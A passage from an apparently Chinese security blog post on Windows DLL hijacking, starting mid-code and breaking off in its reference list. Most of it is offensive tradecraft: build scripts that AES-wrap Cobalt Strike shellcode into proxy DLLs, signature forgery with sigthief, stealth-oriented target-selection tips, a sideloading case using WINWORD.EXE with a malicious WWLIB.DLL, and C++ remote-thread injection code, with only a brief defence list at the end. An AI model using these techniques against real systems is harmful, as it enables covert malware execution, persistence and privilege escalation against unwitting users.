<span class="token punctuation">{</span><span class="token function">printf</span><span class="token punctuation">(</span><span class="token string">"使用静态链接:\n"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>DWORD dwHandle<span class="token punctuation">,</span> sz <span class="token operator">=</span> <span class="token function">GetFileVersionInfoSizeA</span><span class="token punctuation">(</span><span class="token string">"C:\\windows\\system32\\cmd.exe"</span><span class="token punctuation">,</span> <span class="token operator">&amp;</span>dwHandle<span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token number">0</span> <span class="token operator">==</span> sz<span class="token punctuation">)</span><span class="token punctuation">{</span><span class="token keyword">return</span> <span class="token number">0</span><span class="token punctuation">;</span><span class="token punctuation">}</span><span class="token function">printf</span><span class="token punctuation">(</span><span class="token string">"文件大小：%i"</span><span class="token punctuation">,</span> sz<span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token function">Action</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token keyword">return</span> <span class="token number">0</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>注释LoadLibrary调用，程序在当前目录寻找<code>version.dll</code>，最后在加载32系统目录<code>version.dll</code>：<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/ca853e1661395b37f2341af21917a4dc.png"><br>取消注释，将程序和带有函数转发的<code>version.dll</code>(加载后会弹窗)放入同一文件夹：<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/fe7fe9ab52ac8872579e1edfd7882ae0.gif"></p>
<p>这样就可以对很对程序进行类似的劫持了，可用于权限维持、代码执行、权限提升。大多数时候程序会将自己安装在C盘，C盘的应用程序目录(App Dir)一般有系统的ACL保护，但如果程序对文件夹的权限比较开放也会造成漏洞。还有种情况就是程序加载一些系统不存在或者位置不正确的DLL程序，系统按照搜索顺序搜索时就会当前工作目录 (CWD)和<code>％PATH％</code>环境变量中寻找DLL进行加载。环境变量中的路径包含一些在C盘以外的类似Python、JAVA或其他安装程序的路径，这里的路径普通用户拥有写入权限，结合DLL劫持可以进行权限提升。这部分可以见后文的案例。</p>
<h3 id="DLL重定向"><a href="#DLL重定向" class="headerlink" title="DLL重定向"></a>DLL重定向</h3><p> 更改DLL搜索的位置，可以通过修改或添加<code>％PATH％</code>环境变量、修改清单文件<a target="_blank" rel="noopener" href="https://docs.microsoft.com/en-gb/windows/win32/sbscs/application-manifests">.exe.manifest</a> 文件或重定向文件夹<a target="_blank" rel="noopener" href="https://docs.microsoft.com/en-gb/windows/win32/dlls/dynamic-link-library-redirection">.exe.local</a>以包含恶意DLL。</p>
<p>开启DLL重定向需要创建一个新的注册表项(如果应用程序有清单文件，则忽略任何 <code>.local</code> 目录，命名规则为可执行文件名加上<code>.local</code> )：</p>
<pre class="line-numbers language-cmd"><code class="language-cmd">reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" /v DevOverrideEnable /t REG_DWORD /d 1 /f<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/62aeba76f2e8029ff1100b9d13a97b7d.png"></p>
<h2 id="0x07-DLL-劫持武器化利用"><a href="#0x07-DLL-劫持武器化利用" class="headerlink" title="0x07 DLL 劫持武器化利用"></a>0x07 DLL 劫持武器化利用</h2><p>在DLL劫持过程中主要有两个步骤，一是编写执行功能的DLL，一是进行导出函数的代理。功能DLL一般用来进行shellcode注入，生成的DLL会很容易被安全软件标记为恶意，通过开源项目 <a target="_blank" rel="noopener" href="https://github.com/slaeryan/AQUARMOURY/tree/master/Brownie">Brownie</a>对shellcode进行AES加密和资源封装，达到降低安全软件标记目的。对目标DLL进行导出函数转发时，使用开源项目<a target="_blank" rel="noopener" href="https://github.com/monoxgas/Koppeling">Koppeling</a> 自适应处理，不再需要手动编译。</p>
<h3 id="项目配置"><a href="#项目配置" class="headerlink" title="项目配置"></a>项目配置</h3><p>获取到Brownie源码后，项目结构如下：<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/71d28b10264355b673cc1b98828e02be.png"></p>
<p>在<code>compile64.bat</code>中需要进行一定的修改来适配环境，编译64位的程序，将对应的程序和脚本都换成64位：</p>
<pre class="line-numbers language-python"><code class="language-python">@ECHO OFF
<span class="token punctuation">:</span>设置x64的编译环境
call <span class="token string">"D:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Auxiliary\Build\vcvars64.bat"</span>
<span class="token punctuation">:</span>加密shellcode
python Python\\aes<span class="token punctuation">.</span>py Bin\\payload_x64<span class="token punctuation">.</span>bin Bin\\payload_x64_encrypted<span class="token punctuation">.</span>bin
<span class="token punctuation">:</span>编译资源文件
<span class="token string">"D:\Windows Kits\10\bin\10.0.18362.0\x64\rc.exe"</span> Src\\Resource<span class="token punctuation">.</span>rc
<span class="token punctuation">:</span>Microsoft 资源文件到 COFF 对象的转换
cvtres <span class="token operator">/</span>MACHINE<span class="token punctuation">:</span>x64 <span class="token operator">/</span>OUT<span class="token punctuation">:</span>Src\\Resource<span class="token punctuation">.</span>o Src\\Resource<span class="token punctuation">.</span>res
<span class="token punctuation">:</span> <span class="token operator">/</span>MT 多线程
cl<span class="token punctuation">.</span>exe <span class="token operator">/</span>nologo <span class="token operator">/</span>MT <span class="token operator">/</span>Od <span class="token operator">/</span>GS<span class="token operator">-</span> <span class="token operator">/</span>DNDEBUG <span class="token operator">/</span>W0 <span class="token operator">/</span>Tp Src\\DllProxyTemplate<span class="token punctuation">.</span>cpp <span class="token operator">/</span>link Src\\Resource<span class="token punctuation">.</span>o Kernel32<span class="token punctuation">.</span>lib ucrt<span class="token punctuation">.</span>lib libvcruntime<span class="token punctuation">.</span>lib libcmt<span class="token punctuation">.</span>lib libcpmt<span class="token punctuation">.</span>lib <span class="token operator">/</span>DLL <span class="token operator">/</span>NODEFAULTLIB <span class="token operator">/</span>ENTRY<span class="token punctuation">:</span>DllMain <span class="token operator">/</span>OUT<span class="token punctuation">:</span>Bin\\brownie_x64<span class="token punctuation">.</span>dll <span class="token operator">/</span>MACHINE<span class="token punctuation">:</span>x64 <span class="token operator">/</span>RELEASE <span class="token operator">/</span>MERGE<span class="token punctuation">:</span>_RDATA<span class="token operator">=</span><span class="token punctuation">.</span>text <span class="token operator">/</span>EMITPOGOPHASEINFO
<span class="token punctuation">:</span>清理文件
<span class="token keyword">del</span> <span class="token operator">*</span><span class="token punctuation">.</span>obj
<span class="token keyword">del</span> Src\\Resource<span class="token punctuation">.</span>o
<span class="token keyword">del</span> Src\\Resource<span class="token punctuation">.</span>res<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>然后把<code>Bin\payload_x64.bin</code>换成CobaltStrike的x64的RAW类型shellcode，执行<code>compile64.bat</code>编译。编译完成后使用bat脚本调用Netclone在<code>brownie_x64.dll</code>中添加对<code>C:\Windows\System32\dui70.dll</code>导出函数的代理(<code>prepdll.bat dui70</code>)。最后复制输出文件到<code>LicensingUI</code>文件夹下执行：<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/7d44f74f79247dacc38ec8b3e62610ca.png"></p>
<p>对于<code>Koppeling</code>的<code>Netclone</code>工具实现的原理和各种细节知识参考作者博客文章：<a target="_blank" rel="noopener" href="https://www.netspi.com/blog/technical/adversary-simulation/adaptive-dll-hijacking/">自适应DLL劫持</a>。项目源码中有<code>Python</code>和<code>.Net</code>两个版本，<code>.Net</code>程序在<code>Brownie</code>项目中编译为了<code>Netclone.exe</code>，<code>Python</code>脚本效果也是一样的：</p>
<pre class="line-numbers language-python"><code class="language-python">NetClone<span class="token punctuation">.</span>exe  <span class="token operator">-</span><span class="token operator">-</span>target brownie_x64<span class="token punctuation">.</span>dll <span class="token operator">-</span><span class="token operator">-</span>reference C<span class="token punctuation">:</span>\windows\system32\version<span class="token punctuation">.</span>dll <span class="token operator">-</span>o version<span class="token punctuation">.</span>dll

python3 PyClone<span class="token punctuation">.</span>py brownie_x64<span class="token punctuation">.</span>dll C<span class="token punctuation">:</span>\windows\system32\dbghelp<span class="token punctuation">.</span>dll <span class="token operator">-</span>o dbghelp<span class="token punctuation">.</span>dll<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<p>在<code>Netclone</code>中针对带有符号修饰的DLL也进行了测试(DLLHijacker脚本处理时生成的项目会有语法错误)，也是可以正常处理的：<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/d5811afdb5c9d7c79e42ac4c4182de83.png"></p>
<h3 id="项目优化"><a href="#项目优化" class="headerlink" title="项目优化"></a>项目优化</h3><p>优化有两个方面，一个是快速自动编译和生成，一个是代码性能和处理的一些优化。在编译过程中项目有只有对64位DLL的编译脚本，可以编写32位的：</p>
<pre class="line-numbers language-python"><code class="language-python">@ECHO OFF
<span class="token punctuation">:</span>设置x86的编译环境
@call <span class="token string">"D:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Auxiliary\Build\vcvars32.bat"</span>
<span class="token punctuation">:</span>加密shellcode
python Python\\aes<span class="token punctuation">.</span>py Bin\\payload_x86<span class="token punctuation">.</span>bin Bin\\list<span class="token punctuation">.</span>png Passw0rd!
<span class="token punctuation">:</span>编译资源文件
<span class="token string">"D:\Windows Kits\10\bin\10.0.18362.0\x86\rc.exe"</span> Src\\Resource<span class="token punctuation">.</span>rc
<span class="token punctuation">:</span>Microsoft 资源文件到 COFF 对象的转换
cvtres <span class="token operator">/</span>MACHINE<span class="token punctuation">:</span>x86 <span class="token operator">/</span>OUT<span class="token punctuation">:</span>Src\\Resource<span class="token punctuation">.</span>o Src\\Resource<span class="token punctuation">.</span>res
<span class="token punctuation">:</span> <span class="token operator">/</span>MT 多线程，
cl<span class="token punctuation">.</span>exe <span class="token operator">/</span>nologo <span class="token operator">/</span>MT <span class="token operator">/</span>Od <span class="token operator">/</span>GS<span class="token operator">-</span> <span class="token operator">/</span>DNDEBUG <span class="token operator">/</span>W0 <span class="token operator">/</span>Tp Src\\DllProxyTemplate<span class="token punctuation">.</span>cpp <span class="token operator">/</span>link Src\\Resource<span class="token punctuation">.</span>o Kernel32<span class="token punctuation">.</span>lib ucrt<span class="token punctuation">.</span>lib libvcruntime<span class="token punctuation">.</span>lib libcmt<span class="token punctuation">.</span>lib libcpmt<span class="token punctuation">.</span>lib <span class="token operator">/</span>DLL <span class="token operator">/</span>NODEFAULTLIB <span class="token operator">/</span>ENTRY<span class="token punctuation">:</span>DllMain <span class="token operator">/</span>OUT<span class="token punctuation">:</span>Bin\\brownie_x86<span class="token punctuation">.</span>dll <span class="token operator">/</span>MACHINE<span class="token punctuation">:</span>x86 <span class="token operator">/</span>RELEASE <span class="token operator">/</span>MERGE<span class="token punctuation">:</span>_RDATA<span class="token operator">=</span><span class="token punctuation">.</span>text <span class="token operator">/</span>EMITPOGOPHASEINFO
<span class="token punctuation">:</span>清理文件
<span class="token keyword">del</span> <span class="token operator">*</span><span class="token punctuation">.</span>obj
<span class="token keyword">del</span> Src\\Resource<span class="token punctuation">.</span>o
<span class="token keyword">del</span> Src\\Resource<span class="token punctuation">.</span>res<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>这时候需要在<code>Resource.rc</code>文件中将打包的资源文件名统一：<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/6f31fa1224523b222faf1caacdad4789.png"></p>
<p>要让DLL程序看起来是正常的DLL，继续添加版本等信息。这里在资源文件中补充版本信息时出现”未能完成操作,拒绝访问”，将资源文件涉及到的编辑窗口都关闭即可：<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/171844e4637759a4f18ee94f4ebd40bb.png"></p>
<p>使用ResourceHacker工具获取到目标DLL版本信息后添加到载荷DLL中：<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/459d0e7599aeb80a62a6c2eb1da4de23.png"></p>
<p>还可以通过<code>sigthief.py</code>伪造签名：<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/821d726b56625292c08f5ef6c059227e.png"></p>
<p>在代码上的优化，主要是设置互斥锁防止DLL被加载后反复触发shellcode注入，DllMain代码如下：</p>
<pre class="line-numbers language-c++"><code class="language-c++">BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) {
    HANDLE threadHandle;
    DWORD dwThread;
    switch (fdwReason) {
    case DLL_PROCESS_ATTACH:
    {    // Init Code here
        HANDLE Mutexlock = CreateMutex(NULL, FALSE, "helloword!");// 创建互斥量
        if (GetLastError() == ERROR_ALREADY_EXISTS)
            {CloseHandle(Mutexlock );Mutexlock = NULL;
            }else{threadHandle = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)go, hinstDLL, 0, NULL);CloseHandle(threadHandle);}break;}
    case DLL_THREAD_ATTACH:
        // Thread-specific init code here
        break;
    case DLL_THREAD_DETACH:
        // Thread-specific cleanup code here
        break;
    case DLL_PROCESS_DETACH:
        // Cleanup code here
        break;
    }
    // The return value is used for successful DLL_PROCESS_ATTACH
    return TRUE;
}<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>对比两次DLL劫持后beacon返回情况，没有互斥锁时：<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/d829277d717f60eb34099bb7e724dde9.png"></p>
<p>添加互斥锁后，再怎么操作都只返回首次beacon：<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/0679d2166903017b5c7b4ff20456a809.png"></p>
<h3 id="目标程序要求"><a href="#目标程序要求" class="headerlink" title="目标程序要求"></a>目标程序要求</h3><p>在寻找和利用DLL劫持漏洞时，为了高效稳定、防御规避等需求，可以参考下列建议：</p>
<ol>
<li>主程序带有合法数字签名</li>
<li>程序启动后不退出、不报错</li>
<li>程序可以后台运行</li>
<li>被劫持的DLL不是系统级的</li>
<li>被劫持的DLL程序体积不能过大</li>
<li>触发漏洞后无感知，不影响正常使用</li>
<li>尽量使用进程迁移，否则beacon退出后程序可能也退出。</li>
</ol>
<h2 id="0x08-案例与分析"><a href="#0x08-案例与分析" class="headerlink" title="0x08 案例与分析"></a>0x08 案例与分析</h2><p>一般的，劫持资源类DLL(Satellite DLL)和文件替换来达到攻击效果的不会被接收，更多详情参考腾讯SRC：<a target="_blank" rel="noopener" href="https://security.tencent.com/index.php/blog/msg/20">DLL劫持漏洞解析</a> ，在漏洞挖掘时主要还是关注搜索顺序劫持，特别是权限提升的情况，基本上挖掘到知名产品的DLL劫持后可以进行权限提升就可以申请CVE了。</p>
<h3 id="DLL劫持到权限提升"><a href="#DLL劫持到权限提升" class="headerlink" title="DLL劫持到权限提升"></a>DLL劫持到权限提升</h3><p><a target="_blank" rel="noopener" href="https://blog.zsec.uk/nvidia-cve-2020/">CVE‑2020‑5980</a>是NVIDIA Windows GPU驱动程序在C盘的文件夹权限设置错误，导致普通用户可以写入DLL进行劫持后获得权限提升。在微星(MSI)Dragon_Center(龙中心)程序2.0.116.0版本中也存在提权漏洞，其服务<code>Mystic_Light_Service</code>子进程<code>LEDKeeper2.exe</code>会搜索<code>mscorjit.dll</code>进行加载，但是在其其安装目录下并没有该文件，并且系统目录中也不存在该文件(是.Net的链接库文件，在<code>C:\Windows\Microsoft.NET\Framework\</code>和<code>C:\Windows\WinSxS\</code>下存在)，就造成了在环境变量中进行搜索，可以如下配置Procmon：</p>
<pre class="line-numbers language-python"><code class="language-python">Result contains NOT FOUND
User contains SYSTEM
Path ends <span class="token keyword">with</span> <span class="token punctuation">.</span>dll<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<p><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/414a465883d1ae5ce7b831167005f2ce.png"><br>编写DLL启动SYSTEM权限的CMD(通过Session0穿透的方式)和写入文件：<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/5f6d679ca5a3f96b91c208f157b96965.png"><br>在PATH目录中放入DLL文件后重启服务，成功进行了权限提升：<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/d766de84c87cb15ee82a2ee1142be1e8.png"></p>
<h3 id="当前目录劫持"><a href="#当前目录劫持" class="headerlink" title="当前目录劫持"></a>当前目录劫持</h3><p>当前工作目录 (CWD) DLL 劫持，也被称为相对路径 DLL 劫持。这种利用方式在各种攻击事件中屡见不鲜，主要手法是文件关联程序DLL劫持和“白+黑”利用。</p>
<h4 id="文件关联程序DLL劫持"><a href="#文件关联程序DLL劫持" class="headerlink" title="文件关联程序DLL劫持"></a>文件关联程序DLL劫持</h4><blockquote>
<p>文件关联就是将一种类型的文件与一个可以打开它的程序建立起一种依存关系。一个文件可以与多个应用程序发生关联。可以利用文件的“打开方式”进行关联选择。- 文件关联 - 百度百科</p>
</blockquote>
<p>利用这种文件关联，DLL劫持攻击就可能发生在双击打开图片文件时，在Windows10之前的系统照片查看器中就存在该问题，当照片查看器被设置为默认的图片程序时，双击打开图片时会进行搜索DLL以期望加载<code>lmagingEngine.dll</code>：<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/803bf21f943aee3c9792714143b3eb84.png"><br>查看命令行参数估计是在<code>PhotoViewer.dll</code>中的导出函数<code>ImageView_Fullscreen</code>中没有指定加载目录，触发了DLL搜索：<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/acf05fd43cdf2e873b4f09ae03ce1072.png"></p>
<p>其期望加载的DLL文件 <code>lmagingEngine.dll</code> 在<code>C:\Program Files&lt;(x86)&gt;\Windows Photo Viewer</code>中，触发DLL搜索后会搜索到当前目录，结果就导致了CWD劫持：<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/4e202a51022664cee03fc13bc3396a48.gif"></p>
<h4 id="白加黑利用"><a href="#白加黑利用" class="headerlink" title="白加黑利用"></a>白加黑利用</h4><p>这种利用方式一般是将带有合法签名的应用程序(可以重命名)和恶意 DLL 一起复制到同一文件夹中，执行应用程序后在当前目录加载恶意DLL。就其使用方式而言，它与DLL代理执行有相似之处，但是这种情况利用稍微复杂一些，有可能没有合适的DLL进行函数的代理转发，需要对应用程序流程进行分析以保证执行后程序看起来像是正常的。这种利用方式一般会被称为白+黑利用，或者“自带 LOLbin”。以<code>WINWORD.EXE + WWLIB.DLL</code>白加黑为例，<code>WINWORD.EXE</code>是合法的签名文件，<code>WWLIB.DLL</code>是恶意DLL：<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/c2a44f09a4289668e2b7fa8648d3e98d.png"><br>在实验过程中发现，如果只在DllMain中使用WinExec执行命令是可以成功的，但是在DllMain中想要通过创建远程线程来注入Cobat Strike的shellcode却无法上线：<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/a40fdf16eef1b88cf3ec0d65327741c7.png"><br>这可能是因为<code>WINWORD.EXE</code>代码层面的原因，主进程执行完成就直接退出了，没有线程创建函数的生存时间。以下是通过两个程序加载DLL验证执行情况，其中<code>CmdUseDLL1.exe</code>主程序代码如下：</p>
<pre class="line-numbers language-cpp"><code class="language-cpp"><span class="token macro property">#<span class="token directive keyword">include</span> <span class="token string">&lt;windows.h></span></span>
<span class="token keyword">int</span> <span class="token function">main</span><span class="token punctuation">(</span><span class="token punctuation">)</span>
<span class="token punctuation">{</span>
    HMODULE DLL <span class="token operator">=</span> <span class="token function">LoadLibrary</span><span class="token punctuation">(</span>L<span class="token string">"DllMain.dll"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token keyword">return</span> <span class="token number">0</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p><code>CmdUseDLL2.exe</code>代码如下,与CmdUseDLL1相比主函数中进行了Sleep：</p>
<pre class="line-numbers language-c++"><code class="language-c++">#include <windows.h>
int main()
{
    HMODULE DLL = LoadLibrary(L"DllMain.dll");
    Sleep(1024);
    return 0;
}<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p><code>DllMain.dll</code>核心代码如下，加载后创建线程执行<code>Inject_RemoteThread</code>：</p>
<pre class="line-numbers language-c++"><code class="language-c++">BOOL Inject_RemoteThread()
{
    printf("Inject_RemoteThread!\n");
    WinExec("cmd.exe", 0);
    }

//in DllMain:
case DLL_PROCESS_ATTACH:  // 进程加载DLL触发( LoadLibraryA)
    {
        HANDLE threadHandle;
        threadHandle = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Inject_RemoteThread, hModule, 0, NULL);
        CloseHandle(threadHandle);
        break;
}<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>通过一个gif来观察过程：<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/c7a3d5a2db53be45e61bdd50753763d2.gif"><br>可以看到没有延时的CmdUseDLL1程序直接就退出了，程序没有等待线程函数执行，所以要使得DllMain可以创建线程执行就需要主程序有一定的延时时间。如果说为了让CmdUseDLL1中的线程执行，通过<code>WaitForSingleObject</code>来等待也是不行的，这就涉及到了<strong>加载器锁机制</strong>(为了让线程等待执行，在DllMain中等待线程，会导致死锁)，更多内容查看文档 <a target="_blank" rel="noopener" href="https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-best-practices">动态链接库最佳实践</a>。 再回到<code>WINWORD.EXE</code>无法成功进行shellcode注入问题，使用IDA分析主函数流程：<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/5c0e9544017d6f94ada1fd43e8bd58db.png"><br>主函数调用完DLL导出函数就直接退出了，后续功能都交给DLL执行了。所以要成功让<code>WINWORD.EXE</code>完成预定行为可以直接在DllMain中进行远程线程注入或者DLL中导出函数FMain中进行远程线程注入，以下关键代码是直接在主线程中进行远程注入：</p>
<pre class="line-numbers language-c++"><code class="language-c++">...
BOOL Inject_RemoteThread(LPSTR payload, SIZE_T payloadLen)
{
    STARTUPINFO si;PROCESS_INFORMATION pi;LPVOID lpMalwareBaseAddr;LPVOID lpnewVictimBaseAddr;HANDLE hThread;      // DWORD dwExitCode;
    BOOL bRet = FALSE;
    lpMalwareBaseAddr = payload;
    ZeroMemory(&si, sizeof(si));
    si.cb = sizeof(si);
    ZeroMemory(&pi, sizeof(pi));
    if (CreateProcess("C:\\windows\\system32\\rundll32.exe", NULL, NULL, NULL,FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi) == 0)
    {  return bRet;  }
    lpnewVictimBaseAddr = VirtualAllocEx(pi.hProcess, NULL, payloadLen + 1, MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE);
    if (lpnewVictimBaseAddr == NULL)
    { return bRet; }
    WriteProcessMemory(pi.hProcess, lpnewVictimBaseAddr,(LPVOID)lpMalwareBaseAddr, payloadLen + 1, NULL);
    hThread = CreateRemoteThread(pi.hProcess, 0, 0,(LPTHREAD_START_ROUTINE)lpnewVictimBaseAddr, NULL, 0, NULL);
    return bRet;
}

BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
    {
        Inject_RemoteThread(payload,payloadLen);
        break;
    }
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>在FMain中进行远程注入：</p>
<pre class="line-numbers language-cpp"><code class="language-cpp"><span class="token keyword">extern</span> <span class="token string">"C"</span> <span class="token function">__declspec</span><span class="token punctuation">(</span>dllexport<span class="token punctuation">)</span> <span class="token keyword">int</span> <span class="token function">FMain</span><span class="token punctuation">(</span><span class="token keyword">int</span> a<span class="token punctuation">,</span> <span class="token keyword">int</span> b<span class="token punctuation">,</span> <span class="token keyword">int</span> c<span class="token punctuation">,</span> <span class="token keyword">int</span> d<span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">extern</span> <span class="token string">"C"</span> <span class="token function">__declspec</span><span class="token punctuation">(</span>dllexport<span class="token punctuation">)</span> <span class="token keyword">void</span> <span class="token function">wdCommandDispatch</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">extern</span> <span class="token string">"C"</span> <span class="token function">__declspec</span><span class="token punctuation">(</span>dllexport<span class="token punctuation">)</span> <span class="token keyword">void</span> <span class="token function">wdGetApplicationObject</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">int</span> <span class="token function">FMain</span><span class="token punctuation">(</span><span class="token keyword">int</span> a<span class="token punctuation">,</span> <span class="token keyword">int</span> b<span class="token punctuation">,</span> <span class="token keyword">int</span> c<span class="token punctuation">,</span> <span class="token keyword">int</span> d<span class="token punctuation">)</span> <span class="token punctuation">{</span>
    <span class="token function">Inject_RemoteThread</span><span class="token punctuation">(</span>payload<span class="token punctuation">,</span>payloadLen<span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token keyword">return</span> <span class="token number">1</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>
<span class="token keyword">void</span> <span class="token function">wdCommandDispatch</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
    <span class="token keyword">return</span> <span class="token punctuation">;</span>
<span class="token punctuation">}</span>
<span class="token keyword">void</span> <span class="token function">wdGetApplicationObject</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
    <span class="token keyword">return</span> <span class="token punctuation">;</span>
<span class="token punctuation">}</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>最终的实现是在主流程中执行想要的操作而不使用线程，执行完成将流程返回即可：<br><img src="https://cdn.jsdelivr.net/gh/saymehi/images_depository@latest/2021_10/e5f99259c16fe6563f653dd06535cfa2.gif"></p>
<h3 id="权限维持"><a href="#权限维持" class="headerlink" title="权限维持"></a>权限维持</h3><p>使用DLL劫持漏洞在进行权限维持时比较便捷和稳定，而且大部分被利用的主程序都带有数字签名或者是Windows系统文件，所以在防御规避上也有优秀表现。针对一些常见软件的DLL劫持、Office-wll扩展项等等，在 <a target="_blank" rel="noopener" href="https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows">hijacking-dlls-in-windows-lists</a> 文章中针对Windows下的系统文件进行了大量的DLL劫持测试，已经是比较全了，本文就不再深入了。</p>
<h2 id="0x09-DLL-劫持防御"><a href="#0x09-DLL-劫持防御" class="headerlink" title="0x09 DLL 劫持防御"></a>0x09 DLL 劫持防御</h2><p>防御DLL劫持可以在开发注意进行下列处理：</p>
<ol>
<li>检查DLL文件签名</li>
<li>程序中校验DLL哈希</li>
<li>加载DLL时指定完整的路径</li>
<li>从搜索路径中删除安装目录、当前目录和PATH目录</li>
</ol>
<p>更多的资料还可以参考微软官方文档：<a target="_blank" rel="noopener" href="https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-security">动态链接库安全</a> 以及 <a target="_blank" rel="noopener" href="https://security.tencent.com/index.php/blog/msg/20">TSRC博文</a>。</p>
<h2 id="0x10-参考链接"><a href="#0x10-参考链接" class="headerlink" title="0x10 参考链接"></a>0x10 参考链接</h2><p><a target="_blank" rel="noopener" href="https://trustfoundry.net/what-is-dll-hijacking/">https://trustfoundry.net/what-is-dll-hijacking/</a><br><a target="_blank" rel="noopener" href="https://payloads.online/archivers/2019-10-02/1/">https://payloads.online/archivers/2019-10-02/1/</a><br><a target="_blank" rel="noopener" href="https://www.mandiant.com/resources/abusing-dll-misconfigurations">https://www.mandiant.com/resources/abusing-dll-misconfigurations</a><br><a target="_blank" rel="noopener" href="https://resources.infosecinstitute.com/topic/dll-hijacking-attacks-revisited/">https://resources.infosecinstitute.com/topic/dll-hijacking-attacks-revisited/</a><br><a target="_blank" rel="noopener" href="https://posts.specterops.io/automating-dll-hijack-discovery-81c4295904b0">https://posts.specterops.io/automating-dll-hijack-discovery-81c4295904b0</a><br><a target="_blank" rel="noopener" href="https://book.hacktricks.xyz/windows/windows-local-privilege-escalation/dll-hijacking">https://book.hacktricks.xyz/windows/windows-local-privilege-escalation/dll-hijacking</a><br><a target="_blank" rel="noopener" 